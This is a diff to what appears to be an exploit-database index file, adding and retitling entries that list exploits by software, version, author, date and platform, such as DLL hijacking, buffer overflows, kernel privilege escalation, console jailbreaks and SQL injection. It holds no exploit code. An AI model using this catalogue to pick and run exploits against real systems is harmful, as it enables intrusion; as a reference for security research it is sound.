14723,exploits/windows/local/14723.c,"Microsoft PowerPoint 2010 - 'pptimpconv.dll' DLL Hijacking",2010-08-24,TheLeader,local,windows, -14727,exploits/windows/local/14727.py,"Foxit Reader 4.0 - '.pdf' Multiple Stack Based Buffer Overflow / Jailbreak",2010-08-24,"Jose Miguel Esparza",local,windows, +14727,exploits/windows/local/14727.py,"Foxit Reader 4.0 - '.pdf' Multiple Stack Based Buffer Overflow 'Jailbreak'",2010-08-24,"Jose Miguel Esparza",local,windows, 14726,exploits/windows/local/14726.c,"uTorrent 2.0.3 - 'plugin_dll.dll' DLL Hijacking",2010-08-24,TheLeader,local,windows, 14728,exploits/windows/local/14728.c,"Microsoft Windows Live Email - 'dwmapi.dll' DLL Hijacking",2010-08-24,"Nicolas Krassas",local,windows, 14730,exploits/windows/local/14730.c,"Mozilla Firefox 3.6.8 - 'dwmapi.dll' DLL Hijacking",2010-08-24,"Glafkos Charalambous",local,windows, @@ -9020,7 +9022,7 @@ id,file,description,date,author,type,platform,port 38362,exploits/windows/local/38362.py,"MakeSFX.exe 1.44 - Local Stack Buffer Overflow",2015-09-30,hyp3rlinx,local,windows, 38371,exploits/osx/local/38371.py,"Apple Mac OSX 10.9.5/10.10.5 - 'rsh/libmalloc' Local Privilege Escalation",2015-10-01,rebel,local,osx, 38381,exploits/windows/local/38381.py,"WinRar < 5.30 Beta 4 - Settings Import Command Execution",2015-10-02,R-73eN,local,windows, -38382,exploits/windows/local/38382.py,"ASX to MP3 Converter 1.82.50 - '.asx' Local Stack Overflow",2015-10-02,ex_ptr,local,windows, +38382,exploits/windows/local/38382.py,"ASX to MP3 Converter 1.82.50 (Windows XP SP3) - '.asx' Local Stack Overflow",2015-10-02,ex_ptr,local,windows, 38390,exploits/linux/local/38390.c,"Linux Kernel 3.0 < 3.3.5 - 'CLONE_NEWUSER|CLONE_FS' Local Privilege Escalation",2013-03-13,"Sebastian Krahmer",local,linux, 38403,exploits/windows_x86/local/38403.txt,"TrueCrypt 7 / VeraCrypt 1.13 - Drive Letter Symbolic Link Creation Privilege Escalation",2015-10-05,"Google Security Research",local,windows_x86, 38423,exploits/windows/local/38423.py,"VeryPDF Image2PDF Converter - Local Buffer Overflow (SEH)",2015-10-08,"Robbie Corley",local,windows, @@ -9335,7 +9337,7 @@ id,file,description,date,author,type,platform,port 43359,exploits/linux/local/43359.c,"Firejail < 0.9.44.4 / < 0.9.38.8 LTS - Local Sandbox Escape",2017-01-04,"Sebastian Krahmer",local,linux, 43366,exploits/windows/local/43366.md,"TeamViewer 11 < 13 (Windows 10 x86) - Inline Hooking / Direct Memory Modification Permission Change",2017-12-04,gellin,local,windows, 43390,exploits/windows/local/43390.txt,"Ubiquiti UniFi Video 3.7.3 - Local Privilege Escalation",2017-12-26,"Julien Ahrens",local,windows, -43397,exploits/hardware/local/43397.md,"Sony Playstation 4 (PS4) 4.05 - Jailbreak (WebKit / 'namedobj ' Kernel Loader)",2017-12-27,Specter,local,hardware, +43397,exploits/hardware/local/43397.md,"Sony Playstation 4 (PS4) 4.05 - 'Jailbreak' WebKit / 'namedobj ' Kernel Loader",2017-12-27,Specter,local,hardware, 43418,exploits/linux/local/43418.c,"Linux Kernel < 4.4.0-83 / < 4.8.0-58 (Ubuntu 14.04/16.04) - Local Privilege Escalation (KASLR / SMEP)",2017-08-13,"Andrey Konovalov",local,linux, 43421,exploits/windows/local/43421.py,"Kingsoft Antivirus/Internet Security 9+ - Local Privilege Escalation",2018-01-03,mr_me,local,windows, 43427,exploits/multiple/local/43427.c,"Multiple CPUs - 'Spectre' Information Disclosure",2018-01-03,Multiple,local,multiple, @@ -9359,6 +9361,7 @@ id,file,description,date,author,type,platform,port 44024,exploits/linux/local/44024.rb,"glibc - '$ORIGIN' Expansion Privilege Escalation (Metasploit)",2018-02-12,Metasploit,local,linux, 44025,exploits/linux/local/44025.rb,"glibc - 'LD_AUDIT' Arbitrary DSO Load Privilege Escalation (Metasploit)",2018-02-12,Metasploit,local,linux, 44042,exploits/windows/local/44042.md,"Hotspot Shield - Information Disclosure",2018-01-30,SecuriTeam,local,windows, +44217,exploits/windows/local/44217.py,"IrfanView 4.44 Email Plugin - Buffer Overflow (SEH)",2018-03-02,bzyo,local,windows, 44049,exploits/linux/local/44049.md,"Linux Kernel (Ubuntu 17.04) - 'XFRM' Local Privilege Escalation",2017-11-23,SecuriTeam,local,linux, 44063,exploits/windows/local/44063.md,"Nitro Pro PDF - Multiple Vulnerabilities",2017-07-24,SecuriTeam,local,windows, 44064,exploits/linux/local/44064.md,"Odoo CRM 10.0 - Code Execution",2017-06-30,SecuriTeam,local,linux, @@ -9549,12 +9552,14 @@ id,file,description,date,author,type,platform,port 44168,exploits/windows_x86-64/local/44168.py,"NoMachine < 6.0.80 (x64) - 'nxfuse' Privilege Escalation",2018-02-22,"Fidus InfoSecurity",local,windows_x86-64, 44169,exploits/windows/local/44169.txt,"Armadito Antivirus 0.12.7.2 - Detection Bypass",2018-02-22,"Souhail Hammou",local,windows, 44177,exploits/hardware/local/44177.c,"Sony Playstation 4 (PS4) 4.07 < 4.55 - 'bpf' Local Kernel Code Execution (PoC)",2018-02-26,qwertyoruiop,local,hardware, +44218,exploits/windows/local/44218.py,"IrfanView 4.50 Email Plugin - Buffer Overflow (SEH Unicode)",2018-03-02,bzyo,local,windows, 44198,exploits/hardware/local/44198.md,"Sony Playstation 4 (PS4) 3.50 < 4.07 - WebKit Code Execution (PoC)",2017-04-08,Specter,local,hardware, 44199,exploits/hardware/local/44199.md,"Sony Playstation 4 (PS4) 3.15 < 3.55 - WebKit Code Execution (PoC)",2016-09-06,"TJ Corley",local,hardware, -44200,exploits/hardware/local/44200.md,"Sony Playstation 3 (PS3) < 2.50 - WebKit Code Execution (PoC)",2016-04-21,"TJ Corley",local,hardware, +44200,exploits/hardware/local/44200.md,"Sony Playstation 4 (PS4) < 2.50 - WebKit Code Execution (PoC)",2016-04-21,"TJ Corley",local,hardware, 44204,exploits/linux/local/44204.md,"WebKitGTK 2.1.2 (Ubuntu 14.04) - Heap based Buffer Overflow",2017-08-19,"Ren Kimura",local,linux, 44205,exploits/linux/local/44205.md,"Linux Kernel - 'BadIRET' Local Privilege Escalation",2017-07-24,"Ren Kimura",local,linux, 44206,exploits/hardware/local/44206.c,"Sony Playstation 4 (PS4) 1.76 - 'dlclose' Linux Loader",2016-04-27,"Carlos Pizarro",local,hardware, +38457,exploits/windows/local/38457.c,"ASX to MP3 Converter 1.82.50 (Windows 2003 x86) - '.asx' Local Stack Overflow",2015-10-17,"Ivan Ivanovic",local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -10366,7 +10371,7 @@ id,file,description,date,author,type,platform,port 4488,exploits/windows/remote/4488.html,"Pegasus Imaging ImagXpress 8.0 - Arbitrary File Overwrite",2007-10-05,shinnai,remote,windows, 4506,exploits/windows/remote/4506.html,"Microsoft Visual FoxPro 6.0 - 'FPOLE.OCX' Arbitrary Command Execution",2007-10-09,shinnai,remote,windows, 4514,exploits/linux/remote/4514.c,"Eggdrop Server Module Message Handling - Remote Buffer Overflow",2007-10-10,bangus/magnum,remote,linux, -4522,exploits/ios/remote/4522.html,"Apple iTouch/iPhone 1.1.1 - '.tif' Remote Privilege Escalation / Jailbreak",2007-10-11,"Niacin & Dre",remote,ios, +4522,exploits/ios/remote/4522.html,"Apple iTouch/iPhone 1.1.1 - '.tif' Remote Privilege Escalation 'Jailbreak'",2007-10-11,"Niacin & Dre",remote,ios, 4526,exploits/windows/remote/4526.html,"PBEmail 7 - ActiveX Edition Insecure Method",2007-10-12,Katatafish,remote,windows, 4530,exploits/multiple/remote/4530.pl,"Apache Tomcat - 'WebDAV' Remote File Disclosure",2007-10-14,eliteboy,remote,multiple, 4533,exploits/linux/remote/4533.c,"eXtremail 2.1.1 - 'LOGIN' Remote Stack Overflow",2007-10-15,mu-b,remote,linux,4501 @@ -16276,7 +16281,11 @@ id,file,description,date,author,type,platform,port 44175,exploits/windows/remote/44175.rb,"CloudMe Sync 1.10.9 - Stack-Based Buffer Overflow (Metasploit)",2018-02-26,Metasploit,remote,windows,8888 44176,exploits/hardware/remote/44176.rb,"AsusWRT LAN - Unauthenticated Remote Code Execution (Metasploit)",2018-02-26,Metasploit,remote,hardware,9999 44187,exploits/windows/remote/44187.py,"GetGo Download Manager 5.3.0.2712 - Buffer Overflow (SEH)",2018-02-27,bzyo,remote,windows, -44196,exploits/hardware/remote/44196.md,"Sony Playstation 4 (PS4) 4.55 - Jailbreak (WebKit 5.01 / 'bpf' Kernel Loader 4.55)",2018-02-27,Specter,remote,hardware, +44196,exploits/hardware/remote/44196.md,"Sony Playstation 4 (PS4) 4.55 - 'Jailbreak' WebKit 5.01 / 'bpf' Kernel Loader 4.55",2018-02-27,Specter,remote,hardware, +44226,exploits/php/remote/44226.txt,"TestLink Open Source Test Management < 1.9.16 - Remote Code Execution",2018-03-02,"Manish Tanwar",remote,php, +44227,exploits/php/remote/44227.php,"Joomla! 3.7 - SQL Injection",2017-07-04,"Manish Tanwar",remote,php, +44228,exploits/php/remote/44228.php,"Posnic Stock Management System - SQL Injection",2017-02-03,"Manish Tanwar",remote,php, +44229,exploits/php/remote/44229.txt,"WordPress Plugin Polls 1.2.4 - SQL Injection (PoC)",2017-10-22,"Manish Tanwar",remote,php, 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php, @@ -25602,7 +25611,7 @@ id,file,description,date,author,type,platform,port 18222,exploits/php/webapps/18222.txt,"SePortal 2.5 - SQL Injection (1)",2011-12-09,Don,webapps,php, 18224,exploits/php/webapps/18224.php,"Docebo Lms 4.0.4 - 'Messages' Remote Code Execution",2011-12-09,mr_me,webapps,php, 18230,exploits/php/webapps/18230.txt,"Family CMS 2.7.2 - Multiple Persistent Cross-Site Scripting Vulnerabilities",2011-12-10,"Ahmed Elhady Mohamed",webapps,php, -18231,exploits/php/webapps/18231.txt,"WordPress Plugin UPM-POLLS 1.0.4 - Blind SQL Injection",2011-12-11,Saif,webapps,php, +18231,exploits/php/webapps/18231.txt,"WordPress Plugin UPM Polls 1.0.4 - Blind SQL Injection",2011-12-11,Saif,webapps,php, 18232,exploits/php/webapps/18232.txt,"FCMS CMS 2.7.2 - Multiple Cross-Site Request Forgery Vulnerabilities",2011-12-11,"Ahmed Elhady Mohamed",webapps,php, 18233,exploits/php/webapps/18233.txt,"Xoops 2.5.4 - Blind SQL Injection",2011-12-11,blkhtc0rp,webapps,php, 18236,exploits/php/webapps/18236.txt,"Pixie 1.04 - Blog Post Cross-Site Request Forgery",2011-12-11,hackme,webapps,php, @@ -38935,3 +38944,5 @@ id,file,description,date,author,type,platform,port 44192,exploits/php/webapps/44192.txt,"CMS Made Simple 2.1.6 - Remote Code Execution",2018-02-27,"Keerati T.",webapps,php, 44194,exploits/php/webapps/44194.py,"Concrete5 < 8.3.0 - Username / Comments Enumeration",2018-02-27,"Chapman Schleiss",webapps,php, 44216,exploits/perl/webapps/44216.txt,"Routers2 2.24 - Cross-Site Scripting",2018-02-28,"Lorenzo Di Fuccia",webapps,perl, +44219,exploits/hardware/webapps/44219.txt,"D-Link DIR-600M Wireless - Cross-Site Scripting",2018-03-02,"Prasenjit Kanti Paul",webapps,hardware, +44223,exploits/php/webapps/44223.txt,"uWSGI < 2.0.17 - Directory Traversal",2018-03-02,"Marios Nicolaides",webapps,php,